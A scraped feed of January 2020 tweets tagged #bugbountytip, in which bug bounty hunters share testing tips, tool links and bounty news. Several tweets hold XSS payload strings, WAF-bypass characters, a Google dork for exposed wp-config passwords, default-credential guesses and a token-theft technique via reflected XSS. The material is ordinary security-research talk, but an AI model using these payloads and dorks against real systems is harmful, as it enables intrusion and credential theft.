Anshuman Pattnaik
@anspattnaik


2020-01-19 03:12:24
0 #BugBounty #bugbountytip Found many open ports for a target port 22 - ssh (required password) port 21 - FTP (required password) port 445 - SMTP (required password) port 53 - domain (Possible Dos attack) port 8443 - Admin login page (required password) Should I report it?
Kyle
@B3nac


2020-01-19 02:52:16
0 If the default login request is POST check in Burp if GET is allowed and append the post attributes. For example. https://example . com/login?&username=TotallySecure&password=hunter2 If there is no CSRF token $. #bugbountytip
myo ko
@nutronex


2020-01-19 02:41:59
0 #bugbountytips #bugbountytip tagged as duplicate after 2 weeks :) https://t.co/5aOJw8BEjE
thehackerlab.io
@the_hacker_lab


2020-01-19 00:03:03
2 Rewrote my recon bot to output to markdown and upload to a git server and I love it, next step is to make it a docker container so I can swarm all the wildcards #BugBounty #hackerone #bugcrowd #bugbountytip Only a few of the steps are shown here but add it to your workflow
thehackerlab.io
@the_hacker_lab


2020-01-18 23:45:21
0 Over 50 Domains with XSS found this week on an old AF public program.. then triaged by hackerone.. it was raining alert(https://t.co/7GXCCGXJgp) #bugbountytip Just keep looking....... the bugs are out there !
bugbountytip
@a_l_e_r_t_1_


2020-01-18 18:12:20
1 GET /xyz 404 NOT FOUND GET /xyz/abc 200 OK GET /xyz 403 FORBIDDEN GET /xyz/abc 200 OK Look everywhere !!! #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-18 16:45:48
0 Site: If a post get 1000+ report abuse then site will automatically delete post. h1_squirtle: Clicking the "Report Abuse Button" 1000 TIme. ============= BOOM Post Deleted ============= $$ 300 $$ Profile: h1/h1_squirtle https://t.co/lWhHQIrwEC #bugbountytips #bugbountytip
yodhha
@y0dhha


2020-01-18 12:45:49
0 Task: Find flag, and send your flag to me Hint: It looks like binary but it's not that Don't share your flag Flag Type - NULLCROWD*{} I'll post a solution when the challenge is closed Attachment: https://t.co/x0VIjoGjFT Password - nullcrowd* #bugbountytips #bugbountytip #ctf https://t.co/SXe1drnzLP
dark_warlord14
@dark_warlord14


2020-01-18 08:18:29
0 Guide on how to proxy https traffic from emulator via burpsuite. It works. https://t.co/su35MeoCU4 #bugbountytip
yodhha
@y0dhha


2020-01-18 06:22:31
0 Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application https://t.co/WQ22tfAnmm #bugbounty #bugbountytips #bugbountytip #bugbounty2020goals
yodhha
@y0dhha


2020-01-18 06:21:28
0 1) Cable Haunt Vulnerability Haunts Cable Modems Using Broadcom Chips https://t.co/TTH8SCVSqa 2) Testing for XSS (Like a KNOXSS) https://t.co/kvdt9AjTKQ 3) Hacking Java Deserialization https://t.co/MnvJmuTvaJ #bugbounty #bugbountytip #bugbounty2020goals
Jason
@zeroauth


2020-01-18 02:44:11
0 Want to hear a Bounty Hunter fail? my ImageTragick test payloads this entire time had a typo of my callback address, so this entire time testing image uploads were worthless, and I never documented where they were... #bugbountytip #bugbountytips
healthyoutlet
@healthyoutlet


2020-01-17 22:42:44
0 Click-to-copy feature for an API key? Check for x-frame-options / frame-ancestors. If you can frame the page you can clickjack the key with just a click and a ctrl-v. #BugBountyTip
thehackerish
@thehackerish


2020-01-17 18:00:06
1 #bugbountytip: If you are struggling to run #hashcat on your host, uou may want to run it in #docker instead. I've had success with it, cracking 6 passwords in an assignment. https://t.co/S81qOwyOWs
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-17 17:17:15
0 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/1zOHSPhURn …
Karna
@karna__1


2020-01-17 17:06:08
0 #BugBountyTip #bugbountytips #infosec Yep. A huge difference indeed! When you feel all down and exhausted and messed up, just go get some sleep! Chances are you'll wake up the next day with a different kind of energy :) Take rest and get merry @ArchAngelDDay <3 https://t.co/HKXAMiM37m
B.S aymen
@depression0x01


2020-01-17 11:02:02
0 Anyone here is using RSS feeds ? and which channels are u following for being aware about new CVE's I can't find nist cve channel ? #Security #BugBounty #bugbountytips #BugBountyTip #RSS_FOR_ALL #CVE
Sayaan Alam
@ehsayaan


2020-01-17 08:02:07
0 Just Submitted a Critical Subdomain Takeover to Account Takeover Vulnerability.... Hope For the Best!!! #Hacked #bugbounty #BugBountyTip
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-17 06:34:36
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/ZBC76PiwTP
Paulos Yibelo
@PaulosYibelo


2020-01-17 05:26:30
2 This is one common way for me to find high severity auth bypass vulnerabilities in high profile targets. Example: https://t.co/9GffzeEp0m #bugbounty #bugbountytip https://t.co/mrgnQhnue5
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-17 01:20:06
2 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/8x01PWjpmW
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-17 00:50:46
2 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-17 00:15:30
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/qibBdtN35d
Mrityunjoy
@mitunjoy11


2020-01-16 17:06:55
2 #BugBountyTip When you looking for bugs on a program, always check for programs browser extensions, some times you can got some cool SSRF ;) https://t.co/b1a1zitFjS
siLLyDaDDy
@sillydadddy


2020-01-16 15:50:38
3 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/bqBhpeLOtz
Ammar Amer🇸🇾
@cry__pto


2020-01-16 13:34:57
4 Using CeWL to map a website to build a custom wordlist(for password crackers),using words and phrases scraped from the target web pages: cewl -v -d 2 -m 5 -w results http://xx.xx.xx.xx/home/ -d=Depth to spider -v=Verbose output -m=Minimum word length #bugbountytip #Hacking
intigriti
@intigriti


2020-01-16 13:02:13
36 So you believe UUID's are a sufficient protection against IDOR's? Think again! 🤦 Thanks for the #BugBountyTip, @securinti https://t.co/zx5Xn7iDrE
BSides Ahmedabad
@bsidesahmedabad


2020-01-16 09:02:11
4 Closing note of @stokfredrik at #bsidesahmedabad #bugbountytip #bugbounty #infosec https://t.co/eKeJK1PmYf
Ahmed M. Elhady
@Br3akm30ut


2020-01-15 20:04:58
5 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
dark_warlord14
@dark_warlord14


2020-01-15 17:08:32
0 inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles This google dork is scary as shit. #bugbountytip https://t.co/vWkHcHIMDN
@cr33pb0y
@theyiyibest


2020-01-15 06:56:09
0 Yay, I was awarded a $XXX bounty on @Hacker0x01! First RXSS of the year. Payload: [1].map(alert) https://t.co/7vrkzfnbNA #TogetherWeHitHarder #bugbountytip #wafbypass
Eduard Tolosa
@Edu4rdSHL


2020-01-15 05:54:39
0 @Docker The image size is just 41MB! Special mention to @Spaceprogrammer for the idea and initial dockerfile! #bugbounty #bugbountytips #bugbountytip #osint #recon #tools
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-14 23:52:49
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/FzqCz83DY3
bugbountytip
@a_l_e_r_t_1_


2020-01-14 22:05:09
0 Can I bypass it ? Any suggestions ? ( \ ) #bugbountytips #bugbountytip https://t.co/WshiSHcmrM
Hasan
@hasan_zmzm


2020-01-14 20:20:14
0 Simple #1 rule. #BugBountyTip https://t.co/rUq3znRuov
Nick || hunt4p1zza
@ngkogkos


2020-01-14 19:08:56
3 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/5KxNTLvx4l
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 17:50:39
2 Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
Zero Xyele
@zeroxyele


2020-01-14 17:50:29
0 Get intelligence alerts from your targets using by https://t.co/ceSFlbIYul! (@_IntelligenceX) #hackerone #hacker101 #bugbounty #bugbountytip #bugbountytips #bugcrowd #intelligence https://t.co/rj4FQavyU0
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 17:34:50
1 Active Directory Visualization for Blue Teams and Threat Hunters https://t.co/exGykctRyY Follow #Hackdoor -💰💰💰💰 Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
AkaaZaan
@AkaaZaan


2020-01-14 16:28:30
0 I am giving out $300 to the one who shares a working tip on bypassing Authorization bearer header. #Bugbountytip
robre
@_robre


2020-01-14 15:01:25
0 Create a list of interesting keywords for grep: $ echo „password\ntoken\nsecret\nusername“>~/dict/words.txt $ alias secgrep=‚grep -f ~/dict/words.txt‘ $ secgrep -r somedir/ somedir/file.php: dbpassword: hunter2 #BugBountyTip #bugbountytips #hacking @TomNomNom
reconness
@reconness


2020-01-14 14:01:58
1 Working on screenshot Agents feature #bugbountytips #BugBountyTip #bugbounty2020goals
Mashoud1122
@mashoud1122


2020-01-14 10:21:07
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/NIuW4ennqY
Imran Parray
@CreedHackers


2020-01-14 09:57:31
0 @tirtha_mandal @synack @SynackRedTeam Since you have added #BugBountyTip as a hastag in your tweet i would like to know how this tweet a bug bounty tip.
Israel Thomas
@IsraelThomas_7


2020-01-14 09:05:29
0 I jus love SSL misconfigurations! :) #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 07:04:51
0 https://t.co/AQ1isKOUi5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #cybersecurity
Mourad
@SecuAudit


2020-01-14 04:03:59
0 i need someone who speak Vietnamese . #bugbounty #BugBountyTip
Mashoud1122
@mashoud1122


2020-01-14 01:22:50
1 Using A Reflected XSS to steal FB Auth Tokens[increase impact] if login with facebook is available use the rxss to reflect the location hash. Put the rxss url in the facebook auth flow[ redirect_uri ]. See the magic view the pic for more #BugBountyTip #BugBountyTips #BugBountyTip https://t.co/xKExO8OAcp
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-14 00:58:52
0 Here is another write up for 2fa bypass. https://t.co/CDff0sKP0U … #hacking #bugbountytip #infosec #writeup
dark_warlord14
@dark_warlord14


2020-01-13 18:57:01
0 Hacked up alias for ffuf to store all search results so you can look at them later. #bugbountytips #bugbountytip https://t.co/uDTJUGMTj1
Nick || hunt4p1zza
@ngkogkos


2020-01-13 17:58:38
0 If a subdomain returns a default/under construction or dead page, it may still be worth to run it through @hacker_'s getallurl + @TomNomNom's concurl tools to request all URLs & identify any URLs with different response. See image for commands. #BugBounty #bugbountytip https://t.co/YNXB7uamRY
Numan ÖZDEMİR
@numanozdemircom


2020-01-13 17:57:25
0 Who wanna find Critical (P1) vulnerabilities just in 10 seconds? An easy bounty tip for you. [PHP] Exposing DB Credentials / HttpOnly Bypass / Full Path Disclosure https://t.co/t08E7xzvG5 #BugBounty #bugbountytips #bugbountytip
Ebrahim Hegazy
@Zigoo0


2020-01-13 13:11:57
11 #BugBountyTip When using #Nmap as part of your #Recon arsenal, make sure to add --data-length=50 {or any number in 20~60, the TCP packet header size). Otherwise, Nmap will in many cases return False Positives (i.e. too many open ports, or ports that are not actually open). #TBC
Yadhavi
@PrincessYadhavi


2020-01-13 12:44:10
0 Can I report Exposed google map api key on @Bugcrowd platform program? Is it valid bug? #bugbounty #bugbountytip #bugbountytips
Arif Khan
@payloadartist


2020-01-13 11:56:33
1 I m surprised at how often companies use these credentials in internal login panels: company_name company_name admin company_name employee_name (/github username/from LinkedIn/any public source) company_name #bugbounty #bugbountytip #infosec
Tirtha Mandal
@tirtha_mandal


2020-01-13 09:45:30
1 Thursday's full night hunting finally paid off by @synack. Good start of 2020. Thank you @synack @SynackRedTeam #xss #bugbounty #synack #srt #bugbountytips #bugbountytip #bugbounty2020goals https://t.co/WQWiJCtNPD
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-13 09:22:00
0 When mapping an application, pay special attention to all HTTP requests (i.e. GET and POST), as well as every parameter and form field that is passed to the application. #BugBountyTip #CyberSecurity #infosec https://t.co/D9QWw9BxWm
Lokesh Sonagra
@Anonx_pro


2020-01-13 01:51:02
2 Top Bug Bounty Tools 1. Burp Suit 2. Vulnerability Lab 3. Google Dorks 4. DNS Discovery 5. WAPITI 6. INalyzeR #hackerone #hackers #hack #bugbounty #bugcrowd #python #sqlinjection #programmers #hacks #bugbountytip #ruby #indianhackers #ssrf #developers #bughunters #xxe #hacker
Jason
@zeroauth


2020-01-13 00:35:15
0 Just made a small blog post detailing how I used Frida to bypass SSL cert pinning on a custom cert pinning integration. App developer made their own function instead of using the X509TrustManager. https://t.co/OfYS6ofaBP #bugbountytip #bugbountytips
QSoloX
@QSoloX


2020-01-12 18:27:05
0 How common do you guys find http parameter pollution exploits? Just wacthed a video from @PwnFunction and was very intrigued about it. Its one of those things that even just a month ago i would have never though to be possible. #bugbountytip #bugbounty #hacking
Petko D. Petkov
@pdp


2020-01-12 17:48:04
0 Access to the right tools makes a huge difference when doing pentests and bug bounty hunting. How do you know which tool is good/right? Here is the deal. Good tools ultimately save you time - loads of time. #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-12 13:28:27
0 OLD IS GOLD for @bobby6102000 HACKED NORD VPN OLD WD VERSION $$$$$$$$$$$$$$$$$ BOUNTY $500 $$$$$$$$$$$$$$$$$ READ HERE https://t.co/jSxpimqExU #bugbountytips #bugbountytip BTW BOBBY BRUH #IndiaRejectsCAA_NRC_NPR
Pratik Dabhi
@impratikdabhi


2020-01-12 13:18:08
1 Payload for test XSS , SQLI , SSTI vulnerabilities. '"><svg/onload=alert()>{{7*7}} #Payload #XSS #SQLI #SSTI #BugBountyTip
WebSecurityIT
@WebSecurityIT


2020-01-12 12:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbount…
WebSecurityIT
@WebSecurityIT


2020-01-12 09:30:00
1 RT @godzilla74: Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
d0nut
@d0nutptr


2020-01-12 08:44:07
2 If example[.]com points to IP 1.2.3.4 and redirect to www[.]example[.]com but www[.]example[.]com doesn't point to anything (No A, AAAA, CNAME), try submitting your HTTP request to http://1.2.3.4/ with a "HOST: www[.]example[.]com" header. #bugbountytip #bugbountytips
WebSecurityIT
@WebSecurityIT


2020-01-11 20:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbount…
Rafael Cintra
@RafaelCintraSec


2020-01-11 17:24:37
0 shx_webgame - Resolvendo CTF - Shellter Labs https://t.co/H5AZAr9OaR #hacking #ctf #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2020-01-11 17:00:01
11 New video incoming! 🚨 In this video, we talk APIs. What they are, where to find them, and most importantly how to test them for bugs! We cover: API recon, the most common API bugs and teach you how to find them #bugbountytip #BugBounty #CyberSecurity https://t.co/3hDwOizxwl https://t.co/kPHof1JHtp
yodhha
@y0dhha


2020-01-11 14:52:41
0 Awesome Hacking Tool Lists https://t.co/LauqqrTZ82 #bugbounty #bugbountytips #bugbountytip #android #webpentest #Malware #penteset
Fisher
@Regala_


2020-01-11 14:06:44
2 Tip that has been shared a thousand times but to reiterate: always make a video POC in your reports. It takes 2 minutes and you're covering your future self in case things get fixed, environment change, shit lits on fire. #bugbountytip
Vishnu Vardhan Gadupudi
@vishu10x00


2020-01-11 03:29:38
1 One line to extract urls from a folder #bugbountytip grep -oriahE "https?://[^\"\\'> ]+" *
Abhishek 🕵️
@abhishake100


2020-01-10 17:55:32
2 I just published "My First RCE (Stressed Employee gets me 2x bounty 🤑)" #bugbounty #bug #bounty #bugbountytip https://t.co/11GF7bsr8J
Sourav Sahana
@kernel_rider


2020-01-10 15:34:51
0 Here is another write up for 2fa bypass. https://t.co/ORu7ZWvJjP #hacking #bugbountytip #infosec #writeup
Justin Farmer
@godzilla74


2020-01-10 15:14:02
0 Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-10 09:22:02
4 When doing search engine reconnaissance, do not limit testing to just one search engine provider, as different search engines may generate different results. 🧑‍🤝‍🧑👯 #pentesting #CyberSecurity #infosec #OSINT #BugBountyTip https://t.co/z3TAwSxZnB https://t.co/SD8uQVh5XC
Digital Business News
@DASummerCamp


2020-01-10 05:15:00
0 In this week's blog, iBaibhavJha writes about how he found found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/SJLKTZSdRs
Nassec.io
@nassecio


2020-01-10 04:47:33
2 In this week's blog, @iBaibhavJha writes about how he found found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/tYuY4jldiV
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-10 02:19:15
1 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/zUtp0QmdQK
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-10 00:54:18
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/0GODNlKoK3
Daher Mohamed
@DaherMohamed4


2020-01-09 17:25:00
0 Approx 5k$ bounties for multiple Admin Blind XSS Injection. Thanks @IAmMandatory @Bugcrowd #bugbountytip #bugbountytips Used xsshunter tool for blind xss(s) https://t.co/3vBS224SI2
Renwa
@RenwaX23


2020-01-09 15:22:02
0 OnePlus Bug Bounty Program is Scam #bugbountytip
Oghenejivwe 🇳🇬🗯
@realOghenejivwe


2020-01-09 14:35:34
0 There are very few things on earth more frustrating than spending hourssssssss, looking for bugs and finding none..Worse still in a CTF program! 😐😑 #bugbounty #bugbountytip #bugbounty2020goals
LivEdOverflow 🔴🐸
@LivEdOverflow


2020-01-09 13:35:27
1 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @̶L̶i̶v̶e̶O̶v̶e̶r̶f̶l̶o̶w̶ @EdOverflow!https://t.co/IoLsH8w4aQ https://t.co/aK4FU9iZ6z
intigriti
@intigriti


2020-01-09 13:05:16
13 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @̶L̶i̶v̶e̶O̶v̶e̶r̶f̶l̶o̶w̶ @EdOverflow! https://t.co/bAE0snqYcZ
Rafin Rahman Chy
@rafinrahmanchy


2020-01-09 12:48:21
0 @intigriti It's not a #bugbountytip 😒
Larouanne Tristan
@Tr4LSecurity


2020-01-09 12:10:14
0 Following the release of the MavenDecoder, here is an article on how to use #maven repository, secure them, and unsecure them: https://t.co/etGTIW5Div #pentest #bugbountytip
Rushiikesh
@u1tran00b


2020-01-09 08:47:01
0 Thank you so much for the awesome swag @Bugcrowd.... Waiting for the P1 Warrior Level 3 swag pack now...😁😁....Thanks for being a great platform.... If you are a newbie start your journey with #Bugcrowd #bugbounty #bugbountytips #bugbountytip ❤️❤️ https://t.co/ndXSnTmFpN
Mufeed VH
@mufeedvh


2020-01-08 15:46:26
9 Hey all, I started a youtube channel on bug bounties, programming, and security. This is my first video, an intro about me and the channel. I hope you guys are into memes and stuff. :) https://t.co/U99UY5w2cR #bugbounty #bugbountytip #infosec
STÖK
@stokfredrik


2020-01-08 15:28:44
30 Bug Bounty hunters & Pentesters alike, they all love to run their own domain and DNS Servers to log Out of Band interactions caused by RCEs, XXE's SSRFs and blind requests. And now you can do that too! Better safe than sorry! https://t.co/BgEpHIzjZr #bugbountytip #infosec #howto https://t.co/W5DyPENH5z
Aman Mahendra
@amanmahendra_


2020-01-08 10:44:39
0 Thanks @Hacker0x01 for this amazing hoodie 😍🔥 #bugbountytip #togetherwehitharder https://t.co/pU6HqPMPC9
Ammar Amer
@cry__pto


2020-01-08 10:06:05
6 #BugBounty tools part (5): HTTPScreenShot:https://t.co/qIuJA1SuJW SubBrute:https://t.co/5i2SI5Dzn7 OnlineHashCrack:https://t.co/zkqBbBh4un Wfuzz:https://t.co/qCK5ghmU5H LinkFinder:https://t.co/k015xUNhCm aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Christian Folini
@ChrFolini


2020-01-08 09:25:13
0 Working on my first blog post of the year: fingerprinting the #OWASP ModSecurity @CoreRuleSet This is surprisingly difficult, but I do not like security by obscurity, so here we go! #WAF #CRS3 #BugBountyTip
m0z
@LooseSecurity


2020-01-08 01:06:16
6 Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbounty #infosec #CyberSecurity
Tragger Osbourne🧐
@OsbourneTragger


2020-01-07 17:40:48
0 I am Reversing Engineering the program I made few years ago and trying to Developer some Exploits , I hope 🤞, I will found some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/NtQPLB8oZt
Tragger ⚡️☄️
@NyataraOsborne


2020-01-07 17:35:05
0 I am Reversing Engineering the program I made few years ago and trying to Developer some Exploits , I hope 🤞, I will found some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/waG51ZWIUX
Arif Khan
@payloadartist


2020-01-07 16:38:14
0 Excellent article by @streaak on his recon methodology #bugbounty #bugbountytip https://t.co/UqLBT5AJ3r
AkaaZaan
@AkaaZaan


2020-01-07 16:31:07
0 I want file upload payloads. Anyone guide me to some repository? #bugbountytip
Cryptographer
@crypt0gr4ph3r


2020-01-07 14:55:43
0 #bugbountytip I don't know how and why, I changed the expired token value from xxxxb to xxxxB, and it works 🤣 #hackerone #bugcrowd #bugbounty #hacker101
Sanketh Sharath
@sharathsanketh


2020-01-07 13:20:48
2 The need for making notes and having an organized methodology in bug bounty hunting https://t.co/kgFctJB2PV #bugbounty #bugbountytips #bugbountytip #webhacking
Yassine Aboukir 🐐
@Yassineaboukir


2020-01-07 10:21:11
2 I like decompiling older versions of android mobile apps to find deprecated API legacy endpoints as well as hardcoded creds which are surprisingly valid most often. You may use this mirror website for that purpose https://t.co/coCgEd89ly #bugbountytip
Dewanand Vishal
@dewcode91


2020-01-07 05:29:34
0 People who don't know how to approach a target app in bug bounty. Please Read Web Application Hackers Handbook- Chapter4. #intigriti #bugbountytip
GokhanGK
@gkhck_


2020-01-06 20:34:59
2 My first bug bounty writeup. It was a bit inexperienced but I wanted to share :) #bugbountytips #bugbountytip #infosec https://t.co/JGLTMr4BMK
Ammar Amer
@cry__pto


2020-01-06 16:22:32
5 Practice part (3): https://t.co/WPU9fCoxTd https://t.co/ZwkDd9pnFd https://t.co/XUfNhHJFmk https://t.co/XrESMMzbPD https://t.co/e61c34U8tC https://t.co/vLZjeXTwtQ https://t.co/XHVhlnzJjb https://t.co/7okAXhgpZt #bugbountytip #Hacking #PenTest
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-06 13:42:55
0 Every Hacker Will Agree ! 📲🏆💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gesA7tYLqX
dark_warlord14
@dark_warlord14


2020-01-06 11:23:43
0 What can you do with ffuf? 1. Directory bruteforcing 2. Parameter discovery 3. Vhost bruteforcing 4. Parse waybackurls data filtered by status code, response length It's extremely fast. With 200 threads on 1gb ram VPS, I can get 1000 requests per second easily. #bugbountytip
Dan Cimpean
@DanCimpean


2020-01-05 23:11:44
0 GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties #bugbountytip #bugbounty #infosec https://t.co/ojMfeteDaT
Khaled Mohamed
@xelkomy


2020-01-05 22:06:43
2 Tool #XSpear is very great. @hahwul thanks very much for this a tool😅😍 #bugbountytips #bugbountytip #infosec #xelkomy
Shaked Klein Orbach 🇮🇱
@shakedko


2020-01-05 21:28:25
2 First time I hear about AppBandit by @websecurify (https://t.co/w2W2Rt6205). Have you heard about it? Is it any good? UI seems nicer than Burp's #BugBounty #BugBountyTip #Infosec
yodhha
@s0umadip


2020-01-05 20:06:16
0 awesome-forensics:- A curated list of awesome forensic analysis tools and resources. https://t.co/v9MDCYiQnN #bugbounty #bugbountytips #bugbountytip #forensics https://t.co/bvm7JNYaw0
yodhha
@s0umadip


2020-01-05 19:49:57
0 Offensive Security Wireless Attacks - WiFu v3 https://t.co/i77ZcVJyiK InfiniteSkills - Mastering Python -Networking and Security https://t.co/PwaSg3aXtV Choosen Books for easiest road to OSCP from my experiance https://t.co/8fnP5BkVBi #bugbounty #bugbountytips #bugbountytip
Tirtha Mandal
@tirtha_mandal


2020-01-05 13:44:26
2 I would like to thank my good friend @brutelogic for helping me to bypass WAF❤️❤️ It worked like magic. 😍 #xss #wafbypass #bugbountytip #bugbounty 😍
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:43:38
0 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:40:51
0 "--!><Script%20/K/>confirm(document.domain)</Script%20/K/> 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ '%22--%3E</style></scRipt><scRipt>alert('XSS')</scRipt> "><img src=x onerror=confirm(1);> #bugbountytips #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 06:01:38
1 Stay #CyberSafe Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gyc6PziIKB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 05:57:33
0 Gmail ShortCuts ! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/pkHRBQI2KK
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 04:28:29
3 #OSCP Like VMS ! Lets #TryHarder ! Part 2 — Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ofajN5TlU9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 04:23:37
0 #OSCP Like VMS ! Lets #TryHarder ! Part 1 — Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/469VcpzzPb
android_security
@pwn0sec


2020-01-05 01:15:15
1 Learning Pentesting for Android devices https://t.co/AR2CVpCENh #bugbounty #bugbountytip #bugbountytips #android
bugbountytip
@a_l_e_r_t_1_


2020-01-04 16:11:56
